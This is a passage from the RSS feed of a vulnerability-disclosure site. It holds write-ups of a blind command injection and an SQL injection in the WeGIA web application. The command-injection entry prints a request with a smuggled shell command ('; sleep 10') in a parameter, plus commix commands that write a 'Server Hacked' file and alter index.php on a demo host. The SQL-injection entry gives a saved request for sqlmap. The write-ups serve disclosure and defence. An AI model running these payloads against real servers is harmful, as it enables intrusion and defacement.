	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 22 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-50201</title>
        <link>https://www.cvehunters.com/p/cve-2025-50201/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-50201/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-50201-os-command-injection-blind-time-based-in-debug_infophp-parameter-branch&amp;#34;&amp;gt;CVE-2025-50201: OS Command Injection (Blind Time-Based) in &amp;lt;code&amp;gt;debug_info.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;branch&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-50201&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-50201&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An OS Command Injection vulnerability was identified in the &amp;lt;code&amp;gt;/html/configuracao/debug_info.php&amp;lt;/code&amp;gt; endpoint. The &amp;lt;code&amp;gt;branch&amp;lt;/code&amp;gt; parameter is not properly sanitized before being concatenated and executed in a shell command on the server&amp;#39;s operating system.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This flaw allows an unauthenticated attacker to execute arbitrary commands on the server with the privileges of the web server user &amp;lt;code&amp;gt;(www-data)&amp;lt;/code&amp;gt;. This completely compromises the Confidentiality, Integrity, and Availability of the application and the underlying server.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-50201-os-command-injection-blind-time-based-in-debug_infophp-parameter-branch&amp;#34;&amp;gt;CVE-2025-50201: OS Command Injection (Blind Time-Based) in &amp;lt;code&amp;gt;debug_info.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;branch&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-50201&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-50201&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An OS Command Injection vulnerability was identified in the &amp;lt;code&amp;gt;/html/configuracao/debug_info.php&amp;lt;/code&amp;gt; endpoint. The &amp;lt;code&amp;gt;branch&amp;lt;/code&amp;gt; parameter is not properly sanitized before being concatenated and executed in a shell command on the server&amp;#39;s operating system.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This flaw allows an unauthenticated attacker to execute arbitrary commands on the server with the privileges of the web server user &amp;lt;code&amp;gt;(www-data)&amp;lt;/code&amp;gt;. This completely compromises the Confidentiality, Integrity, and Availability of the application and the underlying server.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The vulnerability can be triggered by sending a POST request to the vulnerable endpoint and injecting shell metacharacters (such as ;) into the branch parameter. The server executes the supplied input without validation. The vulnerability was confirmed to be &amp;#34;Blind,&amp;#34; as the command&amp;#39;s output is not directly reflected in the HTTP response, thus requiring time-based exploitation techniques.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Initial Vulnerable Request:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /html/configuracao/debug_info.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 39
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;branch=master; sleep 10&amp;amp;amp;action=switch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The server&amp;#39;s delayed response confirmed the vulnerability.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;To demonstrate a tangible impact on system integrity, the commix tool was used to inject an echo command that creates a new HTML file in a web-accessible directory on the server.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;1-attack-command&amp;#34;&amp;gt;1. Attack Command:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The following command was executed to create the prova_tcc.html file on the server with custom content:&amp;lt;/p&amp;gt;
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;python3 commix.py -u &amp;#34;https://demo.wegia.org/html/configuracao/debug_info.php&amp;#34; \--data=&amp;#34;branch=master&amp;amp;amp;action=switch&amp;#34; -p &amp;#34;branch&amp;#34; -technique=&amp;#34;time&amp;#34; \--os-cmd=&amp;#39;echo &amp;#34;&amp;amp;lt;h1&amp;amp;gt;Server Hacked - Server Access Confirmed&amp;amp;lt;/h1&amp;amp;gt;&amp;#34; &amp;amp;gt; prova_tcc.html&amp;#39;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-50201/image.png&amp;#34;
	width=&amp;#34;1919&amp;#34;
	height=&amp;#34;718&amp;#34;
	srcset=&amp;#34;/p/cve-2025-50201/image_hu_3421cbc964fa3b64.png 480w, /p/cve-2025-50201/image_hu_3510a028ee9d8955.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;267&amp;#34;
		data-flex-basis=&amp;#34;641px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;python3 commix.py -u &amp;#34;https://demo.wegia.org/html/configuracao/debug_info.php&amp;#34; --data=&amp;#34;branch=master&amp;amp;action=switch&amp;#34; -p &amp;#34;branch&amp;#34; --technique=&amp;#34;time&amp;#34; --time-sec=2 --os-cmd=&amp;#39;echo &amp;#34;teste&amp;#34; &amp;gt;&amp;gt; ../../index.php&amp;#39;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-50201/image-1.png&amp;#34;
	width=&amp;#34;1919&amp;#34;
	height=&amp;#34;701&amp;#34;
	srcset=&amp;#34;/p/cve-2025-50201/image-1_hu_ea0b5b7bb573c69a.png 480w, /p/cve-2025-50201/image-1_hu_9c883581664d6ba6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;273&amp;#34;
		data-flex-basis=&amp;#34;657px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;2-verification&amp;#34;&amp;gt;2. Verification:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After the command execution, the created file became publicly accessible via the browser at the following URL: &amp;lt;code&amp;gt;https://demo.wegia.org/html/configuracao/prova_tcc.html&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-50201/image-2.png&amp;#34;
	width=&amp;#34;1909&amp;#34;
	height=&amp;#34;1079&amp;#34;
	srcset=&amp;#34;/p/cve-2025-50201/image-2_hu_5fab827df7411270.png 480w, /p/cve-2025-50201/image-2_hu_3bc2d6e16b2b3902.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;176&amp;#34;
		data-flex-basis=&amp;#34;424px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After the command execution, the page &amp;lt;code&amp;gt;https://demo.wegia.org/&amp;lt;/code&amp;gt; has been modified like the imagem bellow:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-50201/image-3.png&amp;#34;
	width=&amp;#34;1906&amp;#34;
	height=&amp;#34;1005&amp;#34;
	srcset=&amp;#34;/p/cve-2025-50201/image-3_hu_a90f67d31bb417bd.png 480w, /p/cve-2025-50201/image-3_hu_89baf0ab6503b852.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;455px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Successful exploitation of this vulnerability allows an unauthenticated attacker to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Compromise Confidentiality: Read sensitive files from the server, including the application&amp;#39;s source code, API keys, and configuration files.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise Integrity: Modify or delete any file to which the www-data user has write permissions, allowing for website defacement, malware injection, or application destruction.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise Availability: Execute commands that consume system resources (CPU, Memory), leading to a Denial of Service (DoS).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Act as a Pivot: Use the compromised server as a base to attack other systems on the internal network.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reporter&amp;#34;&amp;gt;Reporter
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;amp;utm_campaign=share_via&amp;amp;amp;utm_content=profile&amp;amp;amp;utm_medium=android_app&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/pedro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;amp;utm_campaign=share_via&amp;amp;amp;utm_content=profile&amp;amp;amp;utm_medium=android_app&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Pedro Lyrio&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 19 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-52474</title>
        <link>https://www.cvehunters.com/p/cve-2025-52474/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-52474/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-52474-sql-injection-vulnerability-in-id-parameter-on-controlphp-endpoint&amp;#34;&amp;gt;CVE-2025-52474: SQL Injection Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-52474&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-52474&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/WeGIA/controle/control.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /controle/control.php?nomeClasse=MedicamentoControle&amp;amp;amp;metodo=adicionarMedicamento&amp;amp;amp;modulo=pet&amp;amp;amp;nomeMedicamento=DApvMr&amp;amp;amp;id=&amp;amp;lt;PAYLOAD&amp;amp;gt;&amp;amp;amp;aplicacaoMedicamento=YqchRf&amp;amp;amp;descricaoMedicamento=Mrnfdh HTTP/1.1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Save the request in req.txt file:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /controle/control.php?nomeClasse=MedicamentoControle&amp;amp;amp;metodo=adicionarMedicamento&amp;amp;amp;modulo=pet&amp;amp;amp;nomeMedicamento=DApvMr&amp;amp;amp;id=1&amp;amp;amp;aplicacaoMedicamento=YqchRf&amp;amp;amp;descricaoMedicamento=Mrnfdh HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Windows&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;, &amp;amp;#34;Google Chrome&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;, &amp;amp;#34;Not.A/Brand&amp;amp;#34;;v=&amp;amp;#34;99&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://demo.wegia.org/html/home.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga=GA1.1.2068698375.1747601288; _ga_F8DXBXLV8J=GS2.1.s1747660538$o4$g0$t1747660538$j60$l0$h0$dyaL3bJ27Uic34e3jqHnkw5lGenE0npxF8g; PHPSESSID=o79b1cq9suo2gksfpnvr4cus4o
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Then use sqlmap:&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-52474-sql-injection-vulnerability-in-id-parameter-on-controlphp-endpoint&amp;#34;&amp;gt;CVE-2025-52474: SQL Injection Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-52474&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-52474&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/WeGIA/controle/control.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /controle/control.php?nomeClasse=MedicamentoControle&amp;amp;amp;metodo=adicionarMedicamento&amp;amp;amp;modulo=pet&amp;amp;amp;nomeMedicamento=DApvMr&amp;amp;amp;id=&amp;amp;lt;PAYLOAD&amp;amp;gt;&amp;amp;amp;aplicacaoMedicamento=YqchRf&amp;amp;amp;descricaoMedicamento=Mrnfdh HTTP/1.1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
